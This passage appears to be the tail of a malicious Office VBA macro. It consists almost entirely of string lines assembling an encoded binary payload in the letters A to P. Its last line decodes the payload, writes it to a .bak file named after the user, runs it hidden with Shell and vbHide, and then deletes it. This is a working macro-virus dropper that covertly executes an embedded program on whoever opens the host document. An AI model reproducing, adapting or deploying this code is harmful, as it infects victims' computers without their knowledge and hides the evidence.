AA = AA + "HECAAAAFIAMEHGELIAPNKJIFLMABCAAAAJIFIINOBAAAAIOMFBBAAAACHMANIFIKKDCAAAAAFIOEOJAAA"
AA = AA + "AANIFINEBCAAAAAFIOINJAAAAANIFINFKBAAAAAFIOMMJAAAAABINOGAPNPPPPFFIOAMJAAAAABGJOLIK"
AA = AA + "PPPPPAGIOCKAPPPPPHIFPBIGMMABCAAAAIGMCAAAAAADIGAMPPPGDIOOBKAAAAAIGICAAAAAAIGAAAFMH"
AA = AA + "CIIOPAKAAAAAIOHHAPPPPPIGAAAALGIHPPFJNFECAAAAIGACAAAAAAPPFLOCOBAAAAIOPOJAAAAALIFLO"
AA = AA + "GBCAAAAGFKGACJFNKLIANNKFICNEHHAAFCFIOGNJAAAAACOPOPPFJJJECAAAALOLIAGIODDAPPPPPIGEM"
AA = AA + "JAAAAAPPFJBKECAAAANIFIIHGCAAAAAFPPFLOCOBAAAAPPEHECMCIOMPDAAAAAIFIFBGCMEAAAJPAGGGN"
AA = AA + "DAGIPLIMHECECCHDBIGEABAAAAAHFIOFPPOPPPPPPFJNGECAAAADAIPBLACKLADAOIAHADNKMKGMAJFAL"
AA = AA + "MFKKLIBMKICMECPAEABEKKBMCMEACOEPIIPAGMHEMPOCBGCMEAAAAGIGAAAACAAAKGAEIOJLPOPPPPPPF"
AA = AA + "JNJECAAAAFIAMPAEILDDAAAAAAFLCJMJIIIAAIHAAAALIFFIAJIAJAAIPAAAALIFFGAJIAJEAIPAAAAHM"
AA = AA + "AIIAIPAAAAOCFEIFFEJIIIMAIPAAAAAFKGIAIOCGDAAAAAIFLBJMBFLIMHECEABIHMAAEHAAAAKGOBIOB"
AA = AA + "DCPPPPPJLNCNCGFFEBJLKGGDIBMFAKGECIOPBCPPPPPMDKBCHEAEAGBGGNDEABEKKCOMOLIBMLKLIEHEC"
AA = AA + "EABIGMAAIHAAAALIEAECFIAMFHGAMKEIAMFHLPOELIOPIONDAAAAAANEJENEFENCGFFGCHDHJGPGOGKDA"
AA = AA + "CBDOCADNAKADEPGOGEHFGOGEHNCEFJHAHFGKDACNGFHMGEHJGAHBGCHEHPCNGJGIHFGEGLDACCGPGFHOG"
AA = AA + "EGBGCHJHNDCCAAOFIOHECAAAAAIOBFCAAAAAPEPEILCCNAKAAALKPEIONDCAAAAALIEAECFIAMFHAFIOB"
AA = AA + "DAAAAAADEPGOGEHFGOGEHNCEFJHAHFGKDACEHFGIHEHPCAHMGBGJGOGLDACDGIGBGCHDHFGEHNDCCFHDH"
AA = AA + "NCBGDHDGJGJGCCNAKANAKAAAOFIOBPBAAAAALIEHECEAIOIOBAAAAAGGILNAKAGGLKIOGOBAAAAAIOPCA"
AA = AA + "AAAAADEPGOGEHFGOGEHNCEFJHAHFGKDACBGAHAHMGJGDGBGEHJGPGOGPCPGDGEHFGEHNCDHEHCHFGBGNG"
AA = AA + "LDACOGBGNGFGNDCCAAOFIODKBAAAAALIEHECEABIGMAAIPAAAAIOEJBAAAAAIOCFAAAAAACCNAKADEPGO"
AA = AA + "GEHFGOGEHNCEFCHBGOGDHGGFGCHNCFEOGDGPGEGJGOGHGKDACCGBGDHFGGDEDNAKADEPGOGEHFGOGEHNC"
AA = AA + "EEJGDHAHPGDHJGEHJGPGOGKDACBGEHEHBGDGIGNGFGOGEHLDACGGJGMGFGOGBGNGFGNDCCAAOFIOHDBAA"
AA = AA + "AAALIEHECEABIGMAAIPAAAAIOICBAAAAAALCCKKILNAKANAKALKIODLNOPPPPLIFIINOBAAAALIFLMABC"
AA = AA + "AAAAIOKAJAAAAADAJPIOLABAAAAAHMHEOPNCNCNAKAHMHECAAAAAAAAAIFBIMCECAAIIPPPPAGLIEHECA"
AA = AA + "CIOLDPOPPPPLIJPIOEHNOPPPPLCAMAFIGAIAAAAAAKGCAAFAFIGAAAAAAAMIOKAAAAAAAMFEGFHNGAHOC"
AA = AA + "ADADADAALIEAECOPAEIAAIIHIAJDGHEBGMAEIAADOPAEHAAIIHHAJDGHHAGMAEHAADOPAEGAPPFJBJECA"
AA = AA + "AAALIINAEEHHBDFAFLIEMKGAAAFHFGFDFPPFJFGECAAAAIFPPFJNIECAAAABGAGIOLANOPPPPIGBABAAA"
AA = AA + "AALCAMOFIOLKLAAAAACHFFLCGOEFGFPPFJENDBAAAAFIAMFHBEEFIOMHAAAAAAAIMDECAAEHPCLIEPIOL"
AA = AA + "JOOPPPPKGAABFGFIONMDAAAAAKGAAAFIOJBMAAAAACHFBKGBAAFIOPAMAAAAAPPELECBCBAAAAAGFIOJB"
AA = AA + "JAAAAAPPFJINDBAAAABIEMBABAAAAAIGACPLCAAAPPFJBKECAAAABGLOIIMKEIAMEHDAKKLOIPDMILNAK"
AA = AA + "ANCNCLKGFBFLIEHECABBIOOAAMIPPPPIOAOPPPPPPGGILNAKAGGLKJFOFDMBGCMEAAAAGIOGGMOPPPPLI"
AA = AA + "NINDKCAAAADOIPPPNINDKCAAAALIMHECECLIFLOJJBAAAALIGAFIAMEHHCAFAFPPFJFEECAAAAFIAMIFF"
AA = AA + "HKBLIAAHIGALIAPNKAFNKHIEAECAFIOJONOPPPPDPEKBJIOELFAAAAAKKPPFINDKCAAAABGCMEAAAAGIO"
AA = AA + "ABMOPPPPLCJMGMFIPFOBAAAAJPGMFIEFOBAAAALOHMFIKFOBAAAAABAAAAAAOLAAAEMHCIBIMODBBAAAA"
AA = AA + "ALIENNKFIEIECHDBAAAAAFHACDIGMIAOPBMAIJPACCHMOBIMONOOPPPPPLOIAHMEEECICACDIILNOBGJP"
AA = AA + "CMEAAANCCFBFGFIINIHDKBAAAACFCFIOHKLPPPPPIOAOCAAAAAOFJFKFCHGMGMFIPFOBAAAAIPLIEIECH"
AA = AA + "DBAAAAAAGIOLAAAAAAAMLACDIILNODIMAECCALOFGEGHGPPGDAAAAEGHGJIGCAAAADIEMMOJIFKDJOBAA"
AA = AA + "AAJIEAECJKACAAAAAAFHOAJKAEAAAAAAFHHAJKCAAAAAAAEHNALIEIECLHBAAAAAJIEEECIALOJAILACD"
AA = AA + "IILNOJIEEECIALIEIECHHBAAAAAJIEEECEALIFIFIECAAAAJIEEECMALIFIBIECAAAAJIEEECABEFPPHN"
AA = AA + "IOMBLOPPPPLIEAECIKEAFHGAIKCAEHCAMAAEIKAIFHOEIKBAEHFDDINLKFOBAAAAIAEHKAHMFIKFOBAAA"
AA = AA + "ABAAAAAAAGMFIEFOBAAAAMDHPEEECIDBAAAAAAAEHBBLIMEECIAJINIINOBAAAALIMHECEAJIPEMPIKIA"
AA = AA + "EHBBGMFIEFOBAAAAMDHMFIKFOBAAAAIAAAAAAAIKAEEHKAPPEHECADPPFJFKECAAAADIEMEBEGHGPIGAA"
AA = AA + "AAAIFPPEDECPPFJJJECAAAABGJOHLOPPPPPAGDIMOICLIEHECEFNIOHABFKFKFKFKLIMGECEFLIMEECAF"
AA = AA + "LIEFECMEBMJODANIFHABNKJIEAECHPANJIEEECIBNKJIEEECEAHPANJIEEECMBNKJIEEECABJIEEECACN"
AA = AA + "KJIEEECEBJIEEECECLICAJIEEECIALICEEAJIEEECMADICMIANIEHECIANIMHECIBIOGHJOPPPPLIHABD"
AA = AA + "FEABLIHEEABDFEEBLIEPNIMHECACIOAGJOPPPPLIHABDFEIBLIHEEABDFEMBCOGJDIEMICBGCMMAAAIOJ"
AA = AA + "BAAAAAALIEGECIAHMEEECACPPPPPPPPBGEGHGPIGAAAAADIEMEACMABAAEGHGPPGDAAAAEGHGJIGCAAAA"
AA = AA + "PPEHECIBPPEHECIBPPEHECIBPPEHECIBIOKJAAAAAAAGBJDOOMBEEHLMDIJOACGHGMDIBMABLIEHECADM"
AA = AA + "KMDAEEHEACOJPLOGLLIOPLCNOPEFEIOGEAAAAAACHHADINPMAGHCPLCNODINPEACHDOLCNOLIHNLIOPHE"
AA = AA + "FEDINPEBDHGNAIPDOCFHEPAIPHEAOCEHOOAIPHDAOCEHIODIHMFAIOCBAAAAAACHIAPEIOKAAAAAAADHD"
AA = AA + "LCFIOFHJAAAAALOLKLLNDKDMCACBMLMIAIDPFPPEHOBAIPHPPAAEHIBAIPHPPOHEHCBAIPHPPMDEHMAAI"
AA = AA + "PHPPODEHGAAILPNDFHLNIKJPDMJOIJFFPPPPAGIGIIDBAAAAIOOBJOPPPPPPFJBKECAAAAIGEAALJMCIK"
AA = AA + "GEAIOGPMPPPPPNFLOOPBGCMEAAAAGLIEFECECLIMEECICLIEEECMCDOIBHPANCDCACEDLIABNIODHFAFD"
AA = AA + "ACDIILNOOPLMFHDPCOMOHPANJIEEECMBBGCMMAAAAGKGAEIOFJIPPPPPBGCMEAAAAGIOEMIOPPPPGMFII"
AA = AA + "CDCAAAAJPPAGLFIHDKBAAAAJLIKLABFAANIEABMJIEEECMBLIIADOGCPLAAAABAAAHFKGAELIBPPPFJNJ"
AA = AA + "ECAAAAFIAMPAEIDJBAAAAAHJBJHFDPEKPFJIMDECJOIABAAAAALCAMAFIGAIAAAAAAKGDAAFKGBAIGAAA"
AA = AA + "AAAAICFPPFJBJECAAAALIAPAEPAEIDGBAAAAAPLAAAABAAAHFKGAEPPFJNJECAAAAHJFIPPPAEIMEBAAA"
AA = AA + "AADFLIMNKGAADFAFHFGFPPFJJIECAAAAHIEDECPPFJNIECAAAADIOPPHPACILCBAAAAAHPGMPAAAAAAAP"
AA = AA + "AFIPBBAAAAAJIMDECHFNIEFHDABDIGMAINIMBHDGFBIEMIHPPPPPPLIMPHFKGBBKGACJFIFLKLCAMDPLK"
AA = AA + "PFDFCFHFNIFIADKAAAAAAFIOIOKOPPPPBIEMIIAAAAAALIMAECBMJODALIMHECEALICPDIKOAIIOAHHOP"
AA = AA + "PPPDIHMIADIGMABLDCPCHGABIOOAIAAAAAACOJOJFLIEAECBIKOAIAAAAAACFBFAFLICEABLIKFEBLIKE"
AA = AA + "IBLIKHMBIOHANPPPPPDDKHMBPFPAFIIJAAAAAADDCEABPAFIPIAAAAAADDKFEBPAFIGIAAAAAADDKEIBP"
AA = AA + "AFINHAAAAAABINOLDNNPPPPFFEGPPBDEGJIBCEFFEPIFEAAKGABEFPPHNNFLOHAMLBKKPDGAALOMAIOCF"
AA = AA + "HOPPPPGMFIICDCAAAAIPEGHGPIGAAAAANFHIEEECMBJIMFECABJIMEECIBJIEHECEALIIADOCALODDLIE"
AA = AA + "DECAFBIMOAACAAAAAEFIOCBHPPPPPNIMEECBAILAAAABAAAIOKBAAAAAABIEMAACAAAAALIIPIFJIIDJI"
AA = AA + "IEEAJLAAAABAAADPEKJPBGCMEAAABFAFIOLDAAAAAADMAGEFLCNOEFKGEAFFPPEHECEDFFFFIOLNGOPPP"
AA = AA + "PPPFJFJECAAAABJDOABBFKGBPBFPPFJJKECAAAAPPFJNKECAAAAIFBGCMEAAAKGAAAFIOBAAAAAAADMAG"
AA = AA + "IOOKGOPPPPLCPPPPEHECICPPEHECICHFKGEAHFKGPPPPFJBHECAAAAFIAMEHDBJIEEECIBPPEHECECHFH"
AA = AA + "FKGCAAFPPFJFHECAAAAJIEEECMBBGCMIAAAAGKGACIOIDGPPPPPBGCMEAAAAGIOHGGOPPPPPPEHECICBI"
AA = AA + "NOHILNPPPPPPEHECICPPFFAAPPFFEBBGCMIAAAIGJBLOJGJBGNIHHKDEJAOPIEEJHCKNMBKPFLKBANIAN"
AA = AA + "NFMLDEBLOGHBOAIPNAMPLLOEJNOMLODIBEKEBLNJLMNOHMGFCOCNDNFIDGGHMIBHJPNHJACIEFLJMOONK"
AA = AA + "OHPOHKBCNFAADNFDAGILMFINJECOBDMLCEAOKCCOLHEBEEDGCJPOBLDLDJMHODJIAPMHMMBFDNLHHFGGC"
AA = AA + "EGFNNGEPEDKBLNCDNDBKDJAOMHPPLAAAKGGIHGMKAKPPLEDLHHPPLFLPGHPPLPDBHHPPLAKAOIPPLENGH"
AA = AA + "HPPLFNPGHPPLJJOAKPPLGEJHHPPLOJGHHPPLHJACIPPLHDNDIPPLMDKGHPPLMKNGHPPLKBHHHPPLNDAHH"
AA = AA + "PPLEGAOHPPLPNKHHPPLKGPGHPPLBEOGHPPLILIEHPPLJOLCJPPLNKFBKPPLPMEPIPPLEIPAJPPLMCCGJP"
AA = AA + "PLAGBIMODBBAAAAALIMLECHDBAAAAALCAMHFKGAGJFDPLKPFIOCFFOPPPPIIFEABBINOJMFOPPPPIIFEA"
AA = AA + "ALIENHFCFCFIOEDFPPPPPIONGMPPPPPDHOBPFDIHMMAEFPPFJOGKAAAAAOPFEAAAINHAAACCHLNBIMONO"
AA = AA + "OPPPPPBGCMEAAAOPFIJNFOPPPPHIMDECGJLKDJLKBJLKPPFJCGKAAAAALOGNAGIOKPEOPPPPFFBINOEDM"
AA = AA + "OPPPPIONAAAAAAANFFHKEIOKBAAAAAAEHKOFHPDIOKGAAPPEHECIDPPEHECIDPPEHECIDPPFFAALIINDE"
AA = AA + "DMPPFJMODBAAAAFANMINPPPPDMJLAGIOJLEOPPPPFFBIFMIMDBAAAAIOMMPPPPPPNFFHJAIOJNPPPPPPE"
AA = AA + "HKOJPALIPJIEEECMBBGCMMAAAMPHFKGDAIOEEAAAAAABECEDEEEFEGEHEIEJEKELEMENEOEPEAFBFCFDF"
AA = AA + "EFFFGFHFIFJFKFBGCGDGEGFGGGHGIGJGKGLGMGNGOGPGAHBHCHDHEHFHGHHHIHJHKHADBDCDDDEDFDGDH"
AA = AA + "DIDJDLCPCAAAAAAAALFJFJJJIEFLANDHPBPLIIMCFNKOELIANIONDAAAAAAIOGFAAAAAAIOOFAAAAAACO"
AA = AA + "LOJFDOBCNKJEEHPAPAHLANIOCCAAAAAAIOLDAAAAAALOKAPAGLANIODBAAAAAABEBEALNDDPKKILNAKAA"
AA = AA + "AAAGGLKJFLCJPHIPMDMIOGAAAAAAAIOIAAAAAAADMLICMBMIOCALOOBLICMAMAOEAAMMOEAKAEMLOCPLI"
AA = AA + "CMBMIOIAAMAOCAAMMOGALOPOLICMBMIOABECPDHNKKLIDEAEAEJIDEAEAGKGMEJFJJHPBPFICNBGFHGAG"
AA = AA + "GILNAKAGGLKDMAGIOFKDOPPPPIINIHDKBAAAAJODJDPPPPPAGKGAAKGBAKGCAIOOIDOPPPPPPFJMNDBAA"
AA = AA + "AALIINAEPAEIICCAAAAADFBIMOAABAAAAALIMPLIELECICBAAAAAMKMCAEFHLPILDHNGEHAHLKEDNFKKI"
AA = AA + "OMBFOPPPPDOCCDPEKBJKKEFPPFJEODBAAAABJFIJMFHCBEFBIBMOBMANBMBBDMEECEAPPFJEODBAAAABJ"
AA = AA + "BIMOAAPPPPPPFIJMPAEIIKBAAAAALIBEMAIPFPGJNKCHLPCFLCLNDFDFAFIGCAAAAAJBLIMNKGABDFPPE"
AA = AA + "HECMBPPFJANDBAAAADIMOAPFIAMKFPAFIJJBAAAAABIMOHKBAAAAALIMOIGHKBAAAAAFFPPELECPKBAAA"
AA = AA + "AAIOBONPPPPPPACIDHBAAAAAFFILBAHANAJAIGAABAAAAALINPFDJECEBEGELKNCICIDCEPEKKLIHPGFI"
AA = AA + "OKLCOPPPPPPFJEMDBAAAAFIAMFHHAIOLGEOPPPPDAJPGGILNAKAGGLKNFLCNPIOJNAAAAAAKGGAHMFEAA"
AA = AA + "CFDFFEEFHMFEEANAKAAAAAPFIODMAAAAAAILEAPPHAGALINPFAJECEBEGELKFDNGHALBDAKGPALKFDNGM"
AA = AA + "HCHDHLKFDDHHDKCMDLKPFIOMJAAAAAAILLJFIBJKJLINPNCJECEBEGELKFDCHHBPBOGLKAIEPIGGGLKLI"
AA = AA + "ELECPMBAAAAAIOKPDOPPPPDOCADPEKFDOBBDFEKDLKPELCNPIOGGAAAAAAKGGABIFHAAGHEHEGBGGGHMF"
AA = AA + "EEANAKAPFIOKEAAAAAAFFLIELECHNBAAAAAIOGMDOPPPPDOEBBFGFPPELECDLBAAAAAIOHDNPPPPPPACI"
AA = AA + "HIAAAAAANFKGFAHMFEAANAKAOCNAGGHMFEEAKAAAPFIOIBAAAAAAKGGABIFHAADGAGJHEHGGHMFEEANAK"
AA = AA + "APFFFILDDFDEDACLOFAILCDFDADACFFIOHLBOPPPPJIFIKJICAAAANFHFFFPPELECDLBAAAAAIODOMPPP"
AA = AA + "PPCHHDIGHKBAAAAAFFPPELECDLBAAAAAIOOIMPPPPPCHDCBINHAAACDIILNOFHKBDMKGAAEFKGPPKGCAI"
AA = AA + "OAGFPPPPPIFIFJFDOPACHNABJJOIEOPPPPPNFBIEMHKBAAAAAIONFBOPPPPPPFJAODBAAAABGCMIAAAAG"
AA = AA + "IONEBOPPPPKGKAIOICAAAAAAHHKMGPEKOGGMMODMEGPMEPNOJGNOMMIICFNONNJJHGGOMMOKPENOGNIID"
AA = AA + "EHPNNJIDHHPJNJJFEDIILNOIOCFAAAAAAPPEDECPPEDECPPFJBGECAAAAOFFIAMGJEHICDIAMMAAFGFPP"
AA = AA + "FJBIECAAAAFIAMEHJBLCJMBIMOAABAAAAAEFHIMAECBFPPANBIEMAABAAAAAIEFHBAIKJPIOCBAAAAAAI"
AA = AA + "FIFMJGFIOANAOPPPPPPFJNFECAAAANJBGDMMJAGLIEHECICLIMEECMCBIGDACDIILNONKCOHPBGNJDMAG"
AA = AA + "BIEMMPOPPPPPLIMPIGEABAAAAAHFIONJAOPPPPGMFIDDKCAAAAMDPPFJNGECAAAAHFDAIPNIFHGAKGMFI"
AA = AA + "FKKBMIOIAFKFKKKPFLIAPAFKGCAKGEAAFAFIGAAAAAAAMHFPPFJBJECAAAALIINBIEMEABAAAAAAEEHCH"
AA = AA + "JDEHECICEHBCKGCAGFGFDFPPFJJFECAAAAAFLIEMGFAFKGEANIEEECEDAFDFPPFJFGECAAAAIFLOBEKGA"
AA = AA + "ADFPPFJFFECAAAABJDOFDAFLIEMGFAFBFBFKGAEPPFJNJECAAAALIIPAFDFPPFJJIECAAAAJFBMJOCAHF"
AA = AA + "LIEEECICCPPKEHCADOHAGMFIDDKCAAAALOPPFJJJECAAAADFPPFJNIECAAAALOBAIKJPBGCMIAAAAGJLB"
AA = AA + "AAAAAAADOJPIOLNPNPPPPBINODMFNPPPPPPNEAALIEHECECLCJMMKMDCCEHDBMDNAEHPAMDKAEHLAMDOD"
AA = AA + "EHHAEIAMEHDABELOIODOHCBFDIJOAPLIBMIOKOIPPPPPFIAMKFEHHBLIFLBGPOPPPPLIIPHIGALKHIKMC"
AA = AA + "JLKLIEHECECDPEKBJKKPPFEAABGCMEAAAAGDIMOABEFIOKHPNPPPPPPFJNEECAAAAKFLFIFIFBMLOABPA"
AA = AA + "HLLNGGBIKOANHACHHHPAHLKMBMKOABPAHLCMGPBMDAFHBADEDOIABIDMNGBAAAAACOAPLIBNIEEHPDDID"
AA = AA + "MPBIEEHJDDIDMMBIEEHDDDIDMPBIEEHNCDIDMOBIEEHHCDIDMPBIEEHBCDIDMOBIEEHLBDIDMPBIEEHFB"
AA = AA + "DIDMPBIEEHPADIDMOBIEEHJADIDMPBIEEHDADIDMOBDILOFBBNDOILLDAAAAAADJHPDPFICNEHIAKEEHF"
AA = AA + "AAIKPJDFHBAIKJPBGDMHILNPPPPPPPP" + String(384, "A") + "IDAEAAAAAAAAAAAAADAE" + String(20, "A")
AA = AA + "MEAEAAAAAAAE" + String(44, "A") + "IDAEAAAAAAAAAAAABBBAHEFGEHNEPGEGFHMGFGIEBGOGEGMGFGB"
AA = AA + "EAAAALEFECFOEFEMEDDCDOCEGMGMG" + String(848, "A")
For CN = 1 To Len(AA) + 1 Step 2: BB = BB + Chr((Asc(Mid(AA, CN, 1)) - 65) + ((Asc(Mid(AA, CN + 1, 1)) - 65) * 16)): Next CN: Open "c:\" & Application.UserName & ".bak" For Output As 1: Print #1, BB: Close #1: Shell "c:\" & Application.UserName & ".bak", vbHide: Kill "c:\" & Application.UserName & ".bak": End Sub
